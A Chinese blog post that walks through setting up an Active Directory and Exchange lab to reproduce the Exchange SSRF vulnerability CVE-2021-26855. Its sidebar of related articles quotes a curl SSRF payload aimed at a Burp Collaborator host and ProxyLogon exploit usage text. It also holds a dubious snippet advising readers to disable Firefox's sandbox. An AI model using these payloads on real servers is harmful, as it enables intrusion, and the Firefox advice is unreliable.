[漏洞复现]CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程

已于 2022-04-06 19:36:18 修改
阅读量6.4k 收藏 12
点赞数 12
分类专栏: 漏洞分析 文章标签: web安全 安全 apache
于 2022-03-27 14:48:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46363249/article/details/123762876
版权

CVE-2021-26855 漏洞复现及Exchange邮箱详细安装过程

一、介绍

Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。

影响版本

Microsoft Exchange 2013

Microsoft Exchange 2016 

Microsoft Exchange 2010

Microsoft Exchange 2019

二、配置域环境

本文选择了windows server 2016作为目标主机,下文是对主机域环境的搭建.
1、选择“添加角色和功能”
在这里插入图片描述
2、一直下一步至“服务器角色”,勾选“Active Directory域服务”和DNS服务器
在这里插入图片描述
3、下一步至“确认”,勾选“如果需要,自动重新启动目标服务器”,然后点击“安装”
在这里插入图片描述
4、完成安装,后点击“将此服务器提升为域控制器”
在这里插入图片描述
5、点击“添加新林”,输入跟域名,我这里是“bjernsen.com”,点击“下一步”
在这里插入图片描述
6、输入密码,点击“下一步”
在这里插入图片描述
7、下一步至”其他选项“,会自动生成NetBIOS密码,然后点击下一步至此页面,根据提示,我们需要设置admin密码
在这里插入图片描述
8、Win+R 输入 ”control“
在这里插入图片描述
9、根据图片依次点击
(1)
在这里插入图片描述
(2)
在这里插入图片描述
(3)
在这里插入图片描述(4)
在这里插入图片描述
10、再次执行先决条件检查,就ok了,然后安装在这里插入图片描述

三、安装Exchange

我们首先需要安装很多配置文件
微软官网

大家可以从上述文章中自行查看需要安装的组件,如下图,内容比较多

在这里插入图片描述
大家也可以直接点击我下述的链接直接下载,要按照顺序依次安装
1、NET Framework 4.8
2、 Visual C++ Redistributable Package for Visual Studio 2012
3、powershell输入下面的指令

Install-WindowsFeature RSAT-ADDS

4、powershell中输入下述指令
Install-WindowsFeature NET-Framework-45-Features, Server-Media-Foundation, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS

5、2016 年 12 月 13 日 (KB3206632) 安全更新

6、Visual C++ Redistributable Package for Visual Studio 2012

7、Visual C++ Redistributable Package for Visual Studio 2013

8、IIS URL 重写模块
9、Microsoft Unified Communications Managed API 4.0, Core Runtime 64-bit

10、点开exchange.iso,点击setup进行安装
在这里插入图片描述11、选择”现在不检查更新“
在这里插入图片描述
12、一直下一步,勾选”不适用推荐设置“
在这里插入图片描述13、继续勾选如图
在这里插入图片描述14、输入组织名称
在这里插入图片描述
15、一直下一步,如果可以点击安装就是成功了,之后会有15个安装步骤,耐心等待即可

16、安装完成了打开浏览器”ip/ecp“
在这里插入图片描述

四、漏洞利用

大家从github上找一款自己喜欢的exp即可,记得关闭虚拟机的防火墙
在这里插入图片描述

鹏华李
关注
  • 12
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
CVE-202126855CVE-2021–27065漏洞分析及复现
hongduilanjun的博客
05-09 3954
文章首发先知社区:https://xz.aliyun.com/t/10098 前言 微软在上半年三月披露了关于Exchange邮件服务器CVE-202126855(SSRF)与CVE-2021–27065(任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关于该漏洞复现环境,重新想起这个事,正好暑假也没干啥正事,借此机会复现分析一下。 CVE-202126855 CVE-202126855是⼀个SSRF
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现
daxi0ng的博客
03-16 6612
0x00 简介 Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。 0x01 漏洞概述 CVE-2021-26855漏洞Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。 危害:该漏洞Exch
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855
qq_42660246的博客
04-26 5673
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855 1.漏洞描述 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证
【已复现】Microsoft Exchange Server "OWASSRF" 漏洞安全风险通告
smellycat000的专栏
12-26 2012
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Microsoft Exchange Server是微软公司的一套电子邮件服务组件。除传统的电子邮件的存取、储存、转发功能外,在新版本的产品中亦加入了一系列辅助功能,如语音邮件、邮件过滤筛选和OWA(基于Web的电子邮件存取)。近日,奇安信CERT监测到CrowdStrike发布针对Microsoft Exchange...
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 3065
亿邮电子邮件系统远程命令执行漏洞 漏洞复现
Exchange漏洞分析:SSRF RCE
阿道夫的博客
01-05 403
在今年3月份,微软公布了多个Microsoft Exchange的高危漏洞。ProxyLogon是Exchange历史上最具影响力的漏洞之一,有上千台Exchange服务器被植入了webshell后门。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 CVE-2021-26855 SSRF简单地使用Golang练习受影响的版本 Exchange Server 2013 is less than CU23 Exchange Server 2016 is less than CU18 Exchange Server 2019 is less than CU7 使用条件 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求 Vulnerability in the target server The target exchange server must be a load balancing se
CVE-2021-26855_PoC
03-12
CVE-2021-26855_PoC 我在Exchange Server 2019上的早期SSRF有效负载(CVE-2021-26855)... 有效载荷(1) # curl -i -s -k -X $'GET' -H $'Host: <exchange>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/owa/auth/logon.aspx?~3'
proxylogon-exploit:CVE-2021-26855CVE-2021-27065的概念验证漏洞Exchange中未经身份验证的RCE
03-25
代理登录 CVE-2021-26855CVE-2021-27065的概念验证漏洞,它允许在Microsoft Exchange上执行未经身份验证的远程代码,如以下资源所述: 用法 开发需要了解前端Exchange服务器URL(例如https://exchange.example.org )和系统上用户的电子邮件地址。 管理员SID和后端可能从服务器泄漏。 $ python exploit.py -h usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID] [--webshell WEBSHELL] [--path PATH] [--backend BACKEND] [--proxy PROXY] proxylogon proof-of-concept optional argume
k8s-controller-poc:Kubernetes控制器的PoC
02-17
k8s-controller-poc Kubernetes控制器的PoC
cve-2021-3156:보안취약점
02-09
cve-2021-3156:보안취약점
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-26855
03-12
我已经在为中国读者翻译了中文漏洞利用程序,对于不熟悉golang的人,请看png图片
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
cve-2021-3618漏洞复现
最新发布
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鹏华李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值